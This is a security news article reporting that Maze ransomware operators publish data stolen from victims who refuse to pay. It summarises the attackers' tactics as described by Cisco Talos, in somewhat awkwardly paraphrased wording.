Maze Ransomware Operators Publish User Information
As if it wasn’t hard enough to have their data compromised, businesses who fell victim to Maze ransomware are now facing another threat: their data could become public.
Maze’s operators have been collecting data from victim organisations for a while, ultimately using it as a weapon until payment is received to decrypt archives. Now, for all those victims who refuse to pay the ransom, they threaten to release the data.
In this respect, a website was created by the threat actor where they identified the names and websites of eight businesses who allegedly refused to pay the sum demanded to retrieve their records.
According to technology journalist Brian Krebs, even though the event did not make news, at least one of the businesses on that list was actually targeted by Maze ransomware.
The Maze operators publish data on that page, such as the initial date of contamination, certain compromised records (office, text and PDF files), the overall volume of data allegedly obtained from the company, and the IP addresses and computer names of the infected servers.
The step is not shocking, particularly since the people behind Maze have been engaging in exfiltrating victim details for a while now and are also threatening to publicly disclose that information if the victim does not pay the demanded ransom.
Throughout one instance in which the Maze ransomware was introduced, the perpetrators first leveraged Cobalt Strike since obtaining access to the network, collecting data about the target area before advancing laterally. Also used was a tactic commonly associated with Russian agent of danger Cozy Bear.
The hackers then began using PowerShell to exfiltrate data and connect to a remote FTP server. They only implemented Maze ransomware after this phase was done to encrypt the data of the victim.
Cobalt Strike was used again after the original breach in another event that Cisco Talos attributed to the same perpetrator, and PowerShell was used to dump large amounts of data using FTP. Without making the information available, the attackers then demanded payment.
The two events are primarily linked through the Command and Control (C&C) technology used— the data was deposited to the same server as in the previously mentioned accident— using 7-Zip to compact the collected data, interactive logins through Windows Remote Desktop Protocol, and remote execution of PowerShell.
“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.
The threat agent could demand more money from the victim with this data in hand, or could monetize it by selling it to other cyber criminals on dark web platforms. Not to mention that entities will pay for the damage incurred by their data being published.
“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.